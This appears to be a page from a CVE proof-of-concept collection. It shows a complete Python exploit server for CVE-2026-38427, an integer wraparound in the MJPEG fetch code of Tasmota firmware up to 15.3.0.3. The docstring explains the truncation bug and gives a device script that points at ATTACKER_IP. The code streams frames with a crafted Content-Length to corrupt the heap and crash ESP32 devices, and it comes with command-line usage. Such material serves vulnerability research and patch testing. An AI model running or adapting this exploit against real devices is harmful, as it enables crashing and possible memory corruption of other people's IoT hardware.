5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2026-38427_poc.py PY
#!/usr/bin/env python3
"""
PoC: CVE-2026-38427
Target: Tasmota <= 15.3.0.3
File: tasmota/tasmota_xdrv_driver/xdrv_10_scripter.ino
Function: fetch_jpg() case 2

Vulnerability:
  Content-Length from MJPEG frame stored in uint16_t:
  
    char inbuff[64];
    stream.readBytesUntil('\n', inbuff, sizeof(inbuff));  // "Content-Length: 70000"
    char *cp = strchr(inbuff, ':');
    uint16_t size = 0;
    if (cp) {
        size = atoi(cp + 1);   // atoi("70000") = 70000 (int)
        // IMPLICIT TRUNCATION: uint16_t size = 70000 → 4464 (70000 % 65536)
    }
    uint8_t *buff = (uint8_t *)special_malloc(size);   // malloc(4464)
    if (buff) {
        stream.readBytes(buff, size);                   // reads 4464 bytes
    }
    // Stream still has 65536 unread bytes → heap/stream corruption

Integer Wraparound:
  value  → uint16_t result
  65536  → 0       (if(size>0) skipped entirely)
  65537  → 1       (malloc 1 byte)
  70000  → 4464    (malloc 4464, but JPEG is 70000 bytes)
  131072 → 0       (malloc 0 / skipped)

Impact:
  - Heap corruption via stream state mismatch
  - malloc(0) or malloc(1) with large data pending → crash
  - On ESP32: special_malloc(0) may return non-NULL → heap corruption

Tasmota script to trigger:
  >D
  >B
  fetchjp(ATTACKER_IP:8889/stream,0,0,1)
  >1
  =fetchjp(2,0,0,1)   ; get next frame (triggers case 2)

Usage:
  python3 CVE-2026-38427_poc.py --port 8889 --cl 65537
  python3 CVE-2026-38427_poc.py --port 8889 --cl 131072

Author: Saidakbarxon Maxsudxonov
CVE: CVE-2026-38427
"""

import socket
import argparse
import time
import os
from datetime import datetime

BANNER = """
╔══════════════════════════════════════════════════════╗
║       CVE-2026-38427 PoC — Tasmota fetch_jpg()      ║
║       uint16_t Integer Wraparound → Heap Overflow    ║
║       Affected: Tasmota <= 15.3.0.3 (ESP32)         ║
╚══════════════════════════════════════════════════════╝
"""

def log(msg, level="*"):
    ts = datetime.now().strftime("%H:%M:%S")
    print(f"[{ts}] [{level}] {msg}")

def uint16_wrap(value):
    """Simulate uint16_t truncation"""
    return value & 0xFFFF

def make_mjpeg_frame(content_length_header, actual_data_size, fill_byte=b'\xff'):
    """
    Build a single MJPEG multipart frame.
    content_length_header = what we PUT in the header (malicious)
    actual_data_size = how much data we actually send
    """
    # Fake minimal JPEG (SOI + EOI markers)
    jpeg_data = (b'\xff\xd8\xff\xe0' +       # SOI + APP0 marker
                 b'\x00\x10JFIF\x00' +        # JFIF header
                 b'\x01\x01\x00\x00\x01' +
                 b'\x00\x01\x00\x00' +
                 fill_byte * (actual_data_size - 20) +  # padding
                 b'\xff\xd9')                  # EOI marker
    
    jpeg_data = jpeg_data[:actual_data_size]
    
    frame = (
        f"--myboundary\r\n"
        f"Content-Type: image/jpeg\r\n"
        f"Content-Length: {content_length_header}\r\n"
        f"\r\n"
    ).encode() + jpeg_data + b"\r\n"
    
    return frame

def handle_client(conn, addr, content_length, frames):
    log(f"Tasmota connected: {addr[0]}:{addr[1]}", "+")
    
    try:
        # Receive initial HTTP request
        request = conn.recv(2048).decode('utf-8', errors='ignore')
        log(f"Request: {request.splitlines()[0] if request else 'empty'}")
        
        # Step 1: Send initial HTTP 200 response (fetch_jpg case 0)
        actual_cl = uint16_wrap(content_length)
        
        log(f"Content-Length in header: {content_length}")
        log(f"uint16_t truncated value:  {actual_cl} ({content_length} & 0xFFFF)")
        log(f"Buffer allocated on ESP32: {actual_cl} bytes")
        log(f"Actual data in stream:     {content_length} bytes")
        log(f"Unread bytes after readBytes(): {content_length - actual_cl}", "!")
        
        # Initial response
        init_response = (
            "HTTP/1.1 200 OK\r\n"
            "Content-Type: multipart/x-mixed-replace; boundary=myboundary\r\n"
            "Connection: keep-alive\r\n"
            "\r\n"
        ).encode()
        conn.send(init_response)
        log("Initial HTTP response sent (case 0 complete)")
        
        time.sleep(0.5)
        
        # Step 2: Send MJPEG frames with malicious Content-Length (case 2)
        for i in range(frames):
            log(f"Sending frame {i+1}/{frames} with Content-Length: {content_length}", "!")
            
            # Send frame with MALICIOUS content-length header
            # but actual_data = content_length bytes to fill the stream
            frame = make_mjpeg_frame(
                content_length_header=content_length,
                actual_data_size=content_length
            )
            
            conn.send(frame)
            log(f"  Header says: {content_length} bytes")
            log(f"  ESP32 reads: {actual_cl} bytes (uint16_t wrap)")
            log(f"  Remaining in stream: {content_length - actual_cl} bytes (CORRUPTION!)", "!")
            time.sleep(0.3)
        
        log("All frames sent — ESP32 should crash/reboot now", "!")
        time.sleep(2)
        
    except BrokenPipeError:
        log("ESP32 disconnected (likely crashed!)", "+")
    except Exception as e:
        log(f"Error: {e}", "-")
    finally:
        conn.close()

def main():
    print(BANNER)
    
    parser = argparse.ArgumentParser(description="CVE-2026-38427 PoC Server")
    parser.add_argument("--ip", default="0.0.0.0")
    parser.add_argument("--port", type=int, default=8889)
    parser.add_argument("--cl", type=int, default=65537,
                        help="Malicious Content-Length (>65535)")
    parser.add_argument("--frames", type=int, default=3,
                        help="Number of frames to send")
    args = parser.parse_args()
    
    if args.cl <= 65535:
        log(f"WARNING: Content-Length {args.cl} <= 65535, no wraparound!", "-")
        log("Use --cl 65537 or higher for wraparound", "-")
    
    print(BANNER)
    log("CVE-2026-38427 — uint16_t Integer Wraparound PoC", "+")
    log(f"Listening: {args.ip}:{args.port}")
    log(f"Content-Length: {args.cl} → wraps to {uint16_wrap(args.cl)}")
    log("─" * 54)
    log("Wraparound table:")
    for cl in [65536, 65537, 65600, 70000, 131072, 131073]:
        wrapped = uint16_wrap(cl)
        log(f"  {cl:>7} → {wrapped:>5}  (corrupts {cl-wrapped} bytes in stream)")
    log("─" * 54)
    log(f"Tasmota script:")
    log(f"  >D")
    log(f"  >B")
    log(f"  fetchjp(YOUR_IP:{args.port}/stream,0,0,1)")
    log(f"  >1")
    log(f"  =fetchjp(2,0,0,1)")
    log("─" * 54)
    
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((args.ip, args.port))
    server.listen(5)
    log("Waiting for Tasmota device...", "*")
    
    try:
        while True:
            conn, addr = server.accept()
            handle_client(conn, addr, args.cl, args.frames)
    except KeyboardInterrupt:
        log("Stopped")
    finally:
        server.close()

if __name__ == "__main__":
    main()